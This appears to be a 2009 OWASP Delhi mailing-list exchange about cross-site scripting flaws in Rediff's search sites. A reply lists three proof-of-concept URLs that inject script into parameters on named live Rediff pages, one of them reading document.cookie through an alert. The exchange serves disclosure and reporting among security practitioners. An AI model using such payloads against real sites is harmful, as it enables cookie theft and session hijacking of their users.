[Owasp-delhi] Rediff Vulnerability

surendra.kumar at rbs.com surendra.kumar at rbs.com
Wed May 27 11:49:39 EDT 2009


Hi Abhay,

XSS still exists in Rediff search.
See the URLs below with PoC.

http://search.rediff.com/imgsrch/default.php?MT=dalai%20lama&start=&perpage=6&page=1&filter=0&imgsize=%22%3E%3CSCRIPT%3Ealert(document.cookie)%3C%2FSCRIPT%3E




http://sitesearch.rediff.com/dirsrch/default.asp?MT=%22%3E%3Cscript%3Ealert(420)%3C/script%3E




http://search1.rediff.com/dirsrch/default.asp?src=web&MT=%2522%253E%253Cscript%253Ealert%28%27XSS%27%29%253C%2Fscript%253E






Thanks & Regards,
Surendra Kumar






"SISA Abhay Bhargav" <ab at sisa.co.in> 
Sent by: owasp-delhi-bounces at lists.owasp.org
05/27/2009 07:57 PM
Please respond to: abhay.bhargav at sisa.co.in
To: <owasp-delhi at lists.owasp.org>
Subject: [Owasp-delhi] Rediff Vulnerability






Hi All
 
I am pleased to see that the Rediff Search XSS issue has been fixed. 
Although I reported the issue to Rediff, I would like to thank some 
members of OWASP Delhi for having taken the matter to a higher plane and 
reporting it to someone who has been proactive. 
 
Unfortunately, several other Rediff sites are as vulnerable to XSS as 
ever. I will probably go ahead and report this issue as well. Hopefully it 
gets sorted out as quickly as the previous one. 
 
Check it out: http://citadelnotes.blogspot.com
 
Regards
Abhay Bhargav
CISSP, CPA, CISA, PCI QSA, OCTAVE Implementer

SISA Information Security (P) Ltd| Ph 91 80 41153769| Fx 91 80 41153796
 
 
 


